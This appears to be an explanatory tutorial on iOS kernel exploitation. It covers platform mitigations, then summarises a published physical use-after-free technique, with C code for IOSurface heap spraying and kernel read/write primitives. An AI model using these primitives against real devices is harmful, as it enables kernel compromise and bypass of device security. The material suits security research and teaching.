iOS Exploiting
iOS Exploit Mitigations
- Code Signing in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple's trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.
- CoreTrust is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Apple's root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.
- Data Execution Prevention (DEP) marks memory regions as non-executable unless they explicitly contain code. This stops attackers from injecting shellcode into data regions (like the stack or heap) and running it, forcing them to rely on more complex techniques like ROP (Return-Oriented Programming).
- ASLR (Address Space Layout Randomization) randomizes the memory addresses of code, libraries, stack, and heap every time the system runs. This makes it much harder for attackers to predict where useful instructions or gadgets are, breaking many exploit chains that depend on fixed memory layouts.
- KASLR (Kernel ASLR) applies the same randomization concept to the iOS kernel. By shuffling the kernel's base address at each boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that would otherwise gain full system control.
- Kernel Patch Protection (KPP) continuously monitors the kernel's code pages to ensure they haven't been modified. If any tampering is detected, such as an exploit trying to patch kernel functions or insert malicious code, the device will immediately panic and reboot. This protection makes persistent kernel exploits far harder, as attackers can't simply hook or patch kernel instructions without triggering a system crash.
- Kernel Text Readonly Region (KTRR) is a hardware-based security feature introduced on iOS devices. It uses the CPU's memory controller to mark the kernel's code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackers, and even privileged code, from patching kernel instructions at runtime, closing off a major class of exploits that relied on modifying kernel code directly.
- Pointer Authentication Codes (PAC) use cryptographic signatures embedded into unused bits of pointers to verify their integrity before use. When a pointer (like a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer was tampered with, the check fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory corruption exploits, making techniques like ROP or JOP much harder to pull off reliably. A minimal sketch of PAC in action is shown after this list.
- Privileged Access Never (PAN) is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it explicitly enables access. This stops attackers who gained kernel code execution from easily reading or writing user memory to escalate exploits or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.
- Page Protection Layer (PPL) is an iOS security mechanism that protects critical kernel-managed memory regions, especially those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, ensuring that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who gain kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses significantly harder.
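To make the PAC description concrete, below is a minimal user-space sketch using Apple clang's `<ptrauth.h>` intrinsics (the intrinsic names and keys are the compiler's public interface; the discriminator value is arbitrary and purely illustrative). It only does anything useful when compiled for arm64e:

```c
#include <stdio.h>
#include <stdint.h>

#if __has_feature(ptrauth_intrinsics)
#include <ptrauth.h>

int main(void) {
    void *target = (void *)&printf;

    // Sign the pointer with the data A-key and an arbitrary discriminator.
    void *signed_ptr = ptrauth_sign_unauthenticated(target, ptrauth_key_asda, 0x1337);

    // Authenticating with the same key/discriminator strips the PAC and
    // yields the original, usable pointer.
    void *ok = ptrauth_auth_data(signed_ptr, ptrauth_key_asda, 0x1337);
    printf("authenticated pointer: %p\n", ok);

    // Flipping a bit (what a memory-corruption primitive would do) makes the
    // authentication fail: on cores with FPAC this traps immediately, on older
    // cores it yields an invalid pointer that faults when dereferenced.
    void *corrupted = (void *)((uintptr_t)signed_ptr ^ 0x10);
    void *bad = ptrauth_auth_data(corrupted, ptrauth_key_asda, 0x1337);
    printf("corrupted pointer after auth: %p\n", bad);
    return 0;
}
#else
int main(void) { puts("build with -arch arm64e to use the PAC intrinsics"); return 0; }
#endif
```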
Physical use-after-free
This is a summary of the post at https://alfiecg.uk/2024/09/24/Kernel-exploit.html. Further information about exploits using this technique can be found at https://github.com/felix-pb/kfd
Memory management in XNU
The virtual memory address space for user processes on iOS spans from 0x0 to 0x8000000000. However, these addresses don't directly map to physical memory. Instead, the kernel uses page tables to translate virtual addresses into actual physical addresses.
Levels of Page Tables in iOS
Page tables are organized hierarchically in three levels:
- L1 Page Table (Level 1):
- Each entry here represents a large range of virtual memory.
- It covers 0x1000000000 bytes (64 GB) of virtual memory.
- L2 Page Table (Level 2):
- An entry here represents a smaller region of virtual memory, specifically 0x2000000 bytes (32 MB).
- An L1 entry may point to an L2 table if it can't map the entire region itself.
- L3 Page Table (Level 3):
- This is the finest level, where each entry maps a single 16 KB memory page (the translation granule used on modern iOS devices).
- An L2 entry may point to an L3 table if more granular control is needed.
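As a sanity check of these sizes, the snippet below splits a virtual address into its L1/L2/L3 indices. The constants are derived from the figures above (16 KB granule, 2048-entry tables); they are a simplification for illustration, not values taken from XNU headers:

```c
#include <stdio.h>
#include <stdint.h>

// Sizes implied by the hierarchy above (16 KB granule, 2048 entries per table).
#define PAGE_SIZE     0x4000ULL        // 16 KB  -> one L3 entry
#define L2_BLOCK_SIZE 0x2000000ULL     // 32 MB  -> one L2 entry (2048 pages)
#define L1_BLOCK_SIZE 0x1000000000ULL  // 64 GB  -> one L1 entry (2048 L2 entries)

int main(void) {
    uint64_t va = 0x1000000000ULL; // example virtual address used below

    uint64_t l1_index = va / L1_BLOCK_SIZE;
    uint64_t l2_index = (va % L1_BLOCK_SIZE) / L2_BLOCK_SIZE;
    uint64_t l3_index = (va % L2_BLOCK_SIZE) / PAGE_SIZE;
    uint64_t page_off = va % PAGE_SIZE;

    printf("L1=%llu L2=%llu L3=%llu offset=0x%llx\n",
           l1_index, l2_index, l3_index, page_off);
    return 0;
}
```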
Mapping Virtual to Physical Memory
- Direct Mapping (Block Mapping):
- Some entries in a page table directly map a range of virtual addresses to a contiguous range of physical addresses (like a shortcut).
- Pointer to Child Page Table:
- If finer control is needed, an entry in one level (e.g., L1) can point to a child page table at the next level (e.g., L2).
Example: Mapping a Virtual Address
Let's say you try to access the virtual address 0x1000000000:
- L1 Table:
- The kernel checks the L1 page table entry corresponding to this virtual address. If it has a pointer to an L2 page table, it goes to that L2 table.
- L2 Table:
- The kernel checks the L2 page table for a more detailed mapping. If this entry points to an L3 page table, it proceeds there.
- L3 Table:
- The kernel looks up the final L3 entry, which points to the physical address of the actual memory page.
Example of Address Mapping
If you write the physical address 0x800004000 into the first index of the L2 table, then:
- Virtual addresses from 0x1000000000 to 0x1002000000 map to physical addresses from 0x800004000 to 0x802004000.
- This is a block mapping at the L2 level.
Alternatively, if the L2 entry points to an L3 table:
- Each 16 KB page in the virtual address range 0x1000000000 -> 0x1002000000 would be mapped by an individual entry in the L3 table.
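The block-mapping example can be checked with simple arithmetic: every virtual address inside the 32 MB window translates to the physical base plus the same offset. The snippet below is only illustrative arithmetic, not real page-table code:

```c
#include <stdio.h>
#include <stdint.h>

#define L2_BLOCK_SIZE 0x2000000ULL // 32 MB covered by one L2 block entry

// Translate a VA that falls inside the example L2 block mapping:
// VA 0x1000000000..0x1002000000 -> PA 0x800004000..0x802004000.
static uint64_t translate_in_block(uint64_t va) {
    uint64_t block_va = 0x1000000000ULL; // start of the mapped VA window
    uint64_t block_pa = 0x800004000ULL;  // physical base written into the L2 entry
    if (va < block_va || va >= block_va + L2_BLOCK_SIZE)
        return (uint64_t)-1;             // outside the block mapping
    return block_pa + (va - block_va);   // same offset inside the 32 MB block
}

int main(void) {
    printf("0x1000004000 -> 0x%llx\n", translate_in_block(0x1000004000ULL));
    return 0;
}
```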
Physical use-after-free
A physical use-after-free (UAF) occurs when:
- A process allocates some memory as readable and writable.
- The page tables are updated to map this memory to a specific physical address that the process can access.
- The process deallocates (frees) the memory.
- However, due to a bug, the kernel forgets to remove the mapping from the page tables, even though it marks the corresponding physical memory as free.
- The kernel can then reallocate this "freed" physical memory for other purposes, like kernel data.
- Since the mapping wasn't removed, the process can still read and write to this physical memory.
This means the process can access pages of kernel memory, which could contain sensitive data or structures, potentially allowing an attacker to manipulate kernel memory.
Exploitation Strategy: Heap Spray
Since the attacker can't control which kernel data will be reallocated into the freed physical pages, they use a technique called heap spray:
- The attacker creates a large number of IOSurface objects in kernel memory.
- Each IOSurface object contains a magic value in one of its fields, making it easy to identify.
- They scan the freed pages to see if any of these IOSurface objects landed on a freed page.
- When they find an IOSurface object on a freed page, they can use it to read and write kernel memory.
More info about this in https://github.com/felix-pb/kfd/tree/main/writeups
Step-by-Step Heap Spray Process
- Spray IOSurface Objects: The attacker creates many IOSurface objects with a special identifier ("magic value").
- Scan Freed Pages: They check if any of the objects have been allocated on a freed page.
- Read/Write Kernel Memory: By manipulating fields in the IOSurface object, they gain the ability to perform arbitrary reads and writes in kernel memory. This lets them:
- Use one field to read any 32-bit value in kernel memory.
- Use another field to write 64-bit values, achieving a stable kernel read/write primitive.
Generate IOSurface objects tagged with the magic value IOSURFACE_MAGIC so they can be located later:
```c
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
    if (*nClients >= 0x4000) return;
    for (int i = 0; i < nSurfaces; i++) {
        fast_create_args_t args;
        lock_result_t result;

        size_t size = IOSurfaceLockResultSize;
        args.address = 0;
        args.alloc_size = *nClients + 1;     // store index+1 so the surface can be matched back later
        args.pixel_format = IOSURFACE_MAGIC; // magic value to scan for in the freed pages

        // Create an IOSurface via external method 6 using the fast-create arguments.
        IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
        io_connect_t id = result.surface_id;
        (*clients)[*nClients] = id;
        *nClients += 1;
    }
}
```
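The `client` handle passed to `spray_iosurface` is an IOSurfaceRoot user client. A minimal sketch of obtaining it with the standard IOKit calls is shown below; the user-client type `0` is an assumption based on public IOSurface exploitation code, not something stated in the original write-up:

```c
#include <IOKit/IOKitLib.h>

// Open a user client to IOSurfaceRoot; its handle is then passed to spray_iosurface().
io_connect_t open_iosurface_client(void) {
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                       IOServiceMatching("IOSurfaceRoot"));
    if (service == IO_OBJECT_NULL) return IO_OBJECT_NULL;

    io_connect_t client = IO_OBJECT_NULL;
    // Type 0 selects the IOSurfaceRoot user client (assumed, as in public exploit code).
    kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &client);
    IOObjectRelease(service);
    return (kr == KERN_SUCCESS) ? client : IO_OBJECT_NULL;
}
```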
Search for IOSurface objects in one freed physical page:
```c
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
    io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
    int nSurfaceIDs = 0;

    for (int i = 0; i < 0x400; i++) {
        // Spray a new batch of IOSurface objects...
        spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);

        // ...then scan the start of every dangling (PUAF) page for the magic value.
        for (int j = 0; j < nPages; j++) {
            uint64_t start = puafPages[j];
            uint64_t stop = start + (pages(1) / 16);

            for (uint64_t k = start; k < stop; k += 8) {
                if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
                    // Found an IOSurface allocated on a freed page we still map.
                    info.object = k;
                    info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1]; // alloc_size holds index+1
                    if (self_task) *self_task = iosurface_get_receiver(k);
                    goto sprayDone;
                }
            }
        }
    }

sprayDone:
    // Release every sprayed surface except the one kept for the read/write primitive.
    for (int i = 0; i < nSurfaceIDs; i++) {
        if (surfaceIDs[i] == info.surface) continue;
        iosurface_release(client, surfaceIDs[i]);
    }
    free(surfaceIDs);

    return 0;
}
```
Achieving Kernel Read/Write with IOSurface
After achieving control over an IOSurface object in kernel memory (mapped to a freed physical page accessible from userspace), we can use it for arbitrary kernel read and write operations.
Key Fields in IOSurface
The IOSurface object has two crucial fields:
- Use Count Pointer: Allows a 32-bit read.
- Indexed Timestamp Pointer: Allows a 64-bit write.
By overwriting these pointers, we redirect them to arbitrary addresses in kernel memory, enabling read/write capabilities.
32-Bit Kernel Read
To perform a read:
- Overwrite the use count pointer to point to the target address minus a 0x14-byte offset.
- Use the `get_use_count` method to read the value at that address.
```c
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
    uint64_t args[1] = {surfaceID};
    uint32_t size = 1;
    uint64_t out = 0;
    // External method 16 returns the surface's use count as a scalar output.
    IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
    return (uint32_t)out;
}

uint32_t iosurface_kread32(uint64_t addr) {
    uint64_t orig = iosurface_get_use_count_pointer(info.object);
    iosurface_set_use_count_pointer(info.object, addr - 0x14); // kernel reads at (pointer + 0x14)
    uint32_t value = get_use_count(info.client, info.surface);
    iosurface_set_use_count_pointer(info.object, orig);        // restore the original pointer
    return value;
}
```
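Since the primitive above only reads 32 bits at a time, it is convenient to wrap it into a 64-bit read by issuing it twice. This helper is a small sketch built only on the `iosurface_kread32` function above:

```c
// 64-bit read built from two 32-bit reads of adjacent words.
uint64_t iosurface_kread64(uint64_t addr) {
    uint64_t lo = iosurface_kread32(addr);
    uint64_t hi = iosurface_kread32(addr + 4);
    return (hi << 32) | lo;
}
```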
64-Bit Kernel Write
To perform a write:
- Overwrite the indexed timestamp pointer to the target address.
- Use the `set_indexed_timestamp` method to write a 64-bit value.
```c
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
    uint64_t args[3] = {surfaceID, 0, value};
    // External method 33 writes the 64-bit value through the indexed timestamp pointer (index 0 here).
    IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}

void iosurface_kwrite64(uint64_t addr, uint64_t value) {
    uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
    iosurface_set_indexed_timestamp_pointer(info.object, addr);
    set_indexed_timestamp(info.client, info.surface, value);
    iosurface_set_indexed_timestamp_pointer(info.object, orig); // restore the original pointer
}
```
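With both primitives in place, a quick sanity check is to write a marker value and read it back. The function below is a hypothetical self-test; `scratch_kaddr` is an illustrative parameter and must point to kernel memory that is safe to clobber:

```c
// Hypothetical sanity check of the read/write primitives.
void test_krw(uint64_t scratch_kaddr) {
    iosurface_kwrite64(scratch_kaddr, 0x4141414142424242ULL);
    uint32_t lo = iosurface_kread32(scratch_kaddr);
    uint32_t hi = iosurface_kread32(scratch_kaddr + 4);
    printf("read back: 0x%08x%08x\n", hi, lo);
}
```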
Exploit Flow Recap
- Trigger Physical Use-After-Free: Free pages are available for reuse.
- Spray IOSurface Objects: Allocate many IOSurface objects with a unique "magic value" in kernel memory.
- Identify Accessible IOSurface: Locate an IOSurface on a freed page you control.
- Abuse Use-After-Free: Modify pointers in the IOSurface object to enable arbitrary kernel read/write via IOSurface methods.
With these primitives, the exploit provides controlled 32-bit reads and 64-bit writes to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).